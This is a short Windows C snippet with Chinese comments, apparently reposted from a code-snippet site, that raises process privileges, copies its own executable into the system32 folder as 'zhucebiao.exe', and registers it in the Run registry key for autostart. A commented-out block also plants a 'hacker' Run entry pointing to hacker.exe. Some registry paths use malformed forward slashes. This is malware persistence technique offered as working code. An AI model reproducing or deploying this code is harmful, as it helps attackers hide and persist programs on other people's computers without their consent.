- #include <stdio.h>
- #include <windows.h>
- void AutoStartRegs(char *nfilename, char *keyname);
- int EnableDebugPriv(const char* name)
- {
- HANDLE hToken;
- if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
- {
- printf("打开指定令牌环失败!\\n");
- return -1;
- }
- LUID luid;
- if( !LookupPrivilegeValue(NULL, name, &luid) )
- {
- printf("查询LUID失败!\\n");
- return -1;
- }
- TOKEN_PRIVILEGES tp;
- tp.PrivilegeCount = 1;
- tp.Privileges[0].Luid = luid;
- tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- if( !AdjustTokenPrivileges(hToken, FALSE, &tp, NULL, NULL, NULL) )
- {
- printf("提升进程权限失败!\\n");
- return -1;
- }
- printf("提升权限成功!\\n");
- return 0;
- }
- int main(void)
- {
- //EnableDebugPriv(SE_DEBUG_NAME);
- char regname[]="Software//Microsoft//Windows//CurrentVersion//Run";
- /*HKEY hkResult;
- int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
- ret=RegSetValueEx(hkResult,"hacker"/* 注册表键名,0,REG_EXPAND_SZ,(unsigned char *)"%systemroot%//hacker.exe",25);
- if(ret==0){
- printf("success to write run key\\nn");
- RegCloseKey(hkResult);
- }
- else {
- printf("failed to open regedit.%d\\nn",ret);
- return 0;
- }*/
- int ret;
- //AutoStartRegs("c:\\\\windows\\\\system32\\\\zhucebiao.exe","xx");
- char modlepath[256];
- char syspath[256];
- GetModuleFileName(0,modlepath,256);//取得程序名字
- GetSystemDirectory(syspath,256);
- //printf("modlepath=%s\\n,strcat(syspath)=%s\\n",modlepath,strcat(syspath,"\\\\zhucebiao.exe"));
- ret=CopyFile(modlepath,"c:\\\\windows\\\\system32\\\\zhucebiao.exe",0);//覆盖原文件
- if(ret)
- {
- printf("%s has been copyed to sys dir %s/n",modlepath,syspath);
- }
- else
- {
- // printf("%d \\n",ret);
- ::printf("%d\\n",GetLastError());
- }
- system("pause");
- return 0;
- }
- void AutoStartRegs(char *nfilename, char *keyname)
- {
- int ret;
- HKEY key;
- ret=RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
- if(ret!=ERROR_SUCCESS)
- {
- printf("\\nret=%d\\n",ret);
- }
- else
- {
- printf("创建键值成功\\n");
- }
- RegSetValueEx(key, keyname, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
- RegCloseKey(key);
- return;
- }
- //该片段来自于http://www.codesnippet.cn/detail/190620149835.html
来源: http://www.codesnippet.cn/detail/190620149835.html